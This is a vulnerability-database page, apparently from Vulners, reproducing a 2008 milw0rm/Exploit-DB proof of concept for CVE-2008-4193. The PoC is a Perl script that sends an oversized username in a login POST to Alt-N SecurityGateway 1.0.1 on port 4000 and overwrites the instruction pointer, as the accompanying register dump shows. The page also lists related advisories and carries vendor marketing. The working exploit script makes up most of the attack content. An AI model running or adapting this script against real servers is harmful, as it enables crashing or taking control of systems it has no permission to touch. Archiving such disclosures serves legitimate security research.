Lucene search
+L

Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)

🗓️ 01 Jun 2008 00:00:00Reported by securfrogType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 29 Views

Alt-N SecurityGateway 1.0.1 Remote Buffer Overflow through Username Fiel

Related
Code
ReporterTitlePublishedViews
Family
canvas
canvas
Immunity Canvas: ALTN_SG
24 Sep 200811:42
canvas
circl
Circl
CVE-2008-4193
1 Jun 200800:00
circl
checkpoint_advisories
Check Point Advisories
Alt-N Technologies SecurityGateway Username Buffer Overflow (CVE-2008-4193)
19 Jun 200800:00
checkpoint_advisories
cve
CVE
CVE-2008-4193
24 Sep 200810:00
cve
cvelist
Cvelist
CVE-2008-4193
24 Sep 200810:00
cvelist
exploitdb
Exploit DB
Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (Metasploit)
7 Jul 201000:00
exploitdb
exploitdb
Exploit DB
Alt-N SecurityGateway 1.00-1.01 - Remote Stack Overflow
15 Jun 200800:00
exploitdb
metasploit
Metasploit
Alt-N SecurityGateway username Buffer Overflow
28 Dec 200920:38
metasploit
nvd
NVD
CVE-2008-4193
24 Sep 200811:42
nvd
packetstorm
Packet Storm
Alt-N SecurityGateway username Buffer Overflow
31 Dec 200900:00
packetstorm
Rows per page
##################################################################################################################
# SecurityGateway 1.0.1 Remote Buffer Overflow ( username)
# Vendor: http://www.altn.com/
# risk : critical
#SecurityGateway open port 4000 for remote administration/managment, EIP get owned  when the username field is filled with 720 chars
#
#eax=00000000 ebx=00000000 ecx=63636363 edx=7c9137d8 esi=00000000 edi=00000000
#eip=63636363 esp=042ce910 ebp=042ce930 iopl=0         nv up ei pl zr na pe nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
#63636363 ??              ???
#
# Replace http://127.0.0.1:4000/ with your remote host.

use LWP::UserAgent;
$connect = LWP::UserAgent->new;
my $payload1 ="a" x 236;
my $payload2 ="b" x 480;
my $eip_owned = "c" x 4;

print "SecurityGateway Remote BoF exploit by securfrog.\n\n";
my $req = HTTP::Request->new(POST => 'http://127.0.0.1:4000/SecurityGateway.dll');
$req->content_type('application/x-www-form-urlencoded');
$req->content('RequestedPage=login&username='.$payload2.$eip_owned.$payload1.'&passwd=world&lang=en&logon=Sign+In');
my $res = $connect->request($req);
print $res->as_string;
print "Exploit successfull\n";

# milw0rm.com [2008-06-01]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Oct 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.74612
29